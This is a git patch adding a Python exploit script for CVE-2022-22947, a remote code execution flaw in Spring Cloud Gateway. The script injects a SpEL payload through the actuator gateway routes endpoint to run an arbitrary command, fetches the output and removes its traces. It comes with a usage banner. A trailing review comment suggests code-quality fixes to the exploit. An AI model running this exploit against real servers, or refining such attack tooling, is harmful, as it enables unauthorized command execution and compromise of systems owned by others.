From 001c32242e87157d5e3a7c39a03b2b388cdc38a7 Mon Sep 17 00:00:00 2001
From: helloexp <21156949+helloexp@users.noreply.github.com>
Date: Fri, 4 Mar 2022 11:06:16 +0800
Subject: [PATCH] =?UTF-8?q?CVE-2022-22947=20=E6=96=B0=E5=A2=9E=E4=B8=80?= =?UTF-8?q?=E4=B8=AAexp?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 .../{spring_cloud_RCE.py => exp/exp01.py} | 0
 00-CVE_EXP/CVE-2022-22947/exp/exp02.py | 71 +++++++++++++++++++
 .../CVE-2022-22947/exp/requirements.txt | 5 ++
 3 files changed, 76 insertions(+)
 rename 00-CVE_EXP/CVE-2022-22947/{spring_cloud_RCE.py => exp/exp01.py} (100%)
 create mode 100644 00-CVE_EXP/CVE-2022-22947/exp/exp02.py
 create mode 100644 00-CVE_EXP/CVE-2022-22947/exp/requirements.txt
diff --git a/00-CVE_EXP/CVE-2022-22947/spring_cloud_RCE.py b/00-CVE_EXP/CVE-2022-22947/exp/exp01.py
similarity index 100%
rename from 00-CVE_EXP/CVE-2022-22947/spring_cloud_RCE.py
rename to 00-CVE_EXP/CVE-2022-22947/exp/exp01.py
diff --git a/00-CVE_EXP/CVE-2022-22947/exp/exp02.py b/00-CVE_EXP/CVE-2022-22947/exp/exp02.py
new file mode 100644
index 0000000..c00aad9
--- /dev/null
+++ b/00-CVE_EXP/CVE-2022-22947/exp/exp02.py
@@ -0,0 +1,71 @@
+import random
+import string
+import requests
+import json
+import sys
+import urllib.parse
+import base64
+
+headers = { "Content-Type": "application/json" , 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36','Accept' : '*/*'}
+
+id = ''.join(random.choice(string.ascii_lowercase) for i in range(8))
+
+def exploit(url, command):
+
+ payload = { "id": id, "filters": [{ "name": "AddResponseHeader", "args": { "name": "Result", "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(\u0022"+command+"\u0022).getInputStream()))}"}}],"uri": "http://example.com"}
+
+ rbase = requests.post(url + '/actuator/gateway/routes/'+id, headers=headers, data=json.dumps(payload), verify=False)
+ if(rbase.status_code == 201):
+ print("[+] Stage deployed to /actuator/gateway/routes/"+id)
+ print("[+] Executing command...")
+ r = requests.post(url + '/actuator/gateway/refresh', headers=headers, verify=False)
+ if(r.status_code == 200):
+ print("[+] getting result...")
+ r = requests.get(url + '/actuator/gateway/routes/' + id, headers=headers, verify=False)
+ if(r.status_code == 200):
+ get_response = r.json()
+ clean(url, id)
+ return get_response['filters'][0].split("'")[1]
+ else:
+ print("[-] Error: Invalid response")
+ clean(url, id)
+ exit(1)
+ else:
+ clean(url, id)
+ print("[-] Error executing command")
+
+
+def clean(url, id):
+ remove = requests.delete(url + '/actuator/gateway/routes/' + id, headers=headers, verify=False)
+ if(remove.status_code == 200):
+ print("[+] Stage removed!")
+ else:
+ print("[-] Error: Fail to remove stage")
+
+def banner():
+ print("""
+ ###################################################
+ # #
+ # Exploit for CVE-2022-22947 #
+ # #
+ # Usage: #
+ # python3 exploit.py #
+ # #
+ # Example: #
+ # python3 exploit.py http://localhost:8080 'id' #
+ # #
+ ###################################################
+ """)
+
+def main():
+ banner()
+ if len(sys.argv) != 3:
+ print("[-] Error: Invalid arguments")
+ print("[-] Usage: python3 exploit.py ")
+ exit(1)
+ else:
+ url = sys.argv[1]
+ command = sys.argv[2]
+ print(exploit(url, command))
+if __name__ == '__main__':
+ main()
\ No newline at end of file
diff --git a/00-CVE_EXP/CVE-2022-22947/exp/requirements.txt b/00-CVE_EXP/CVE-2022-22947/exp/requirements.txt
new file mode 100644
index 0000000..e4f9df0
--- /dev/null
+++ b/00-CVE_EXP/CVE-2022-22947/exp/requirements.txt
@@ -0,0 +1,5 @@
+certifi==2021.10.8
+charset-normalizer==2.0.12
+idna==3.3
+requests==2.27.1
+urllib3==1.26.8
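Review bot: The module-level `id` in exp02.py shadows the builtin and is then reused both as the global route name inside `exploit` and as the parameter name of `clean(url, id)`, which makes the three `clean(url, id)` calls read as if they passed the builtin; `route_id` for the global and the parameter would remove the ambiguity. `exit(1)` in `exploit` and `main` relies on the helper installed by the `site` module rather than the language, so `sys.exit(1)` is the form to use in a script, and `sys` is already imported. `urllib.parse` and `base64` are imported but never referenced. The usage text in `banner` and the `print("[-] Usage: python3 exploit.py ")` line in `main` appear to have lost their argument placeholders; if that is not a rendering artifact of this page, name the two positional arguments there so the `len(sys.argv) != 3` check is self-explanatory.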